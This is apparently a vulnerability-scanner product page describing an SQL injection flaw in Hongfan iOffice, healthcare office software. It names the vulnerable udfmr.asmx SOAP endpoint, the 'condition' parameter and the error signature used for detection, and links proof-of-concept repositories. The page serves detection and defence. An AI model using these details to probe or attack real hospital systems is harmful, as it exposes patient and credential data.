Hongfan OA SQL Injection Scanner
Detects 'SQL Injection' vulnerability in Hongfan iOffice.
Short Info
Level
High
Single Scan
Single Scan
Can be used by
Asset Owner
Estimated Time
10 seconds
Time Interval
24 days 9 hours
Scan only one
Domain, IPv4, Subdomain
Toolbox
-
Hongfan iOffice is widely used in organizational environments to streamline office administrative processes. Particularly popular in hospitals and healthcare facilities, it facilitates document management, workflow automation, and communication tasks. The software provides an integrated platform for managing cloud services specific to the healthcare sector. By allowing seamless transactions across departments, Hongfan iOffice helps in reducing administrative overhead and improving efficiency. It is extensively adopted by SMEs in healthcare seeking centralized control over operations. Moreover, its popularity is bolstered by its user-friendly interface and customizability.
SQL Injection (SQLi) is a critical vulnerability where an attacker can interfere with the queries made to the application's database. Once exploited, SQLi allows attackers to view data that they are not normally able to retrieve, which might include data belonging to other users or any other data that the application itself is able to access. This vulnerability takes advantage of improper coding of web applications that expose the application to SQL command execution on the database server. Exploiting an SQL Injection can compromise the confidentiality, integrity, and availability of the application and the underlying data. Attackers can often escalate an SQLi attack to compromise the underlying server or affect other applications hosted.
The Hongfan iOffice vulnerability lies within the functionality of the SOAP action, specifically within the udfmr.asmx endpoint. Unsafely embedded SQL commands can be exploited by attackers via the 'condition' parameter in SOAP requests. The lack of proper input validation for this parameter allows malicious payloads to manipulate database queries. Attack signatures involve the database engine returning error messages if exploitation attempts are successful. The backend database in question is queried with manipulated inputs that are successful if error messages relating to SQL syntax are returned, such as "System.Data.SqlClient.SqlException".
If successfully exploited, the SQL Injection vulnerability in the Hongfan iOffice system can lead to unauthorized data access by manipulating SQL queries. Attackers can gain sensitive information including but not limited to user credentials, medical records, and administrative data. The integrity of the information could be compromised with data being altered or deleted. The vulnerability leaves the system open to potential full database compromise, possibly allowing attackers control over the database server. This could render medical facilities unable to access critical patient data and other operational information, severely disrupting hospital operations.
REFERENCES
- https://github.com/lal0ne/vulnerability/blob/main/%E7%BA%A2%E5%B8%86OA/iOffice_sqlscan/sql.py
- https://github.com/MrWQ/vulnerability-paper/blob/master/bugs/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91%E7%BA%A2%E5%B8%86%E5%8C%BB%E7%96%97%E4%BA%91%20OA%20udfmr.asmx%20SQL%20%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
